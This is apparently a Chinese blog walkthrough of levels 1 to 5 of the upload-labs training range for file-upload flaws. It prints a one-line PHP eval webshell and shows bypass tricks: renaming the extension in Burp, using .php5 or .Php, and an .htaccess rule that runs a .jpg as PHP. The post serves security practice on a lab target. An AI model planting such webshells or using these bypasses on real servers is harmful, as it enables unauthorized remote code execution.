文件上传漏洞--之upload-labs靶场(第1关到第5关)专栏更新ing.....

第一关:

第一步:新建一个木马文件muma.php

 

c780a19be6254cb3f7f55a963a653c47.png

第二步:在木马文件中写入一句话木马访问php主页

<?php @eval(phpinfo());?>
​

 

45e8189641c915a0036325892359ef68.png

第三步:直接上传试一下

现上传一个png格式文件查看一下

 

7aa3138bf6b7392e95acaa457e84dc6e.png

然后上传一句话木马文件的,但是上传不成功

 

a125466c4ca7ef2f38b4e0d6ba3d21f9.png

第四步:将muma文件改成png格式重新上传抓包

 

ecd0a22bdcd8a0e1e3493d889773858b.png

第五步:在brup里面将文件名后缀改回php

第六步:右键上传后的文件在新的标签页打开

 

475f03c07b19120c8d0983b1f6aa88bd.png

然后查看到木马文件执行成功

 

fa2dc4038486335ead6981ff3775a421.png

然后将muma文件里面的内容改为以下代码重复以上的操作可以连接对方服务器进行操作

<?php @eval($_POST['pass']);?>

第二关:

类似于第一关的。举一反三

第一步:直接上传muma.php文件抓包

 

f48b37bde3f02015671edc205e0046c8.png

 

5202f095dea5924c759b3bd48e20f2e9.png

 

3ad7443ac0b21cb570b648c14cd9a756.png

第三关:

第一步:查看一下源码

 

2e5af0358ec528854c88254c8679d4f7.png

查看到代码里面限制了.php和后缀

第二步:我们输入不受限制的后缀.php5

 

f56dbc292551f13b33ab18b0aa1c39e7.png

第三步,右键上传后的文件在新标签页打开

 

a3b0958d2af7a92eb326ace0c96e632d.png

第四关:

第一步:查看提示,他限制了不让上传以下文件

 

eee7d81e0030debde9e398131389086b.png

第二步:查看一下源代码,就是这里作妖

 

00e3b78e3c0cdcff7006fb0bd7d637be.png

第三步:创建一个.hataccess文件

1、将木马文件命名为muma.jpg

2、在hataccess文件中写入代码如下:

<FilesMatch "muma.jpg">
Sethandler application/x-httpd-php
</FilesMatch>

 

b9420ed259120f77cae375dabc9733c0.png

 

c73c2d49a0a58b6c27c4665205c14341.png

第四步:上传muma.jpg文件,再上传.htaccess文件,访问muma.jpg

 

84a4ef86cbd4fe172cf34fbfba6bd088.png

第五关:

第一步:查看源码,如图所示;输入不在代码里面限制的后缀,例如.Php

 

d3259a29bb95d6e8e00b9403eb319233.png

 

d9685daf7ca58dddaa01d9aa8463ae95.png

第二步:右键,在新建标签页打开访问muma.Php

 

a51d11b2f27630904ec1d0877ce8ada9.png

 

  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值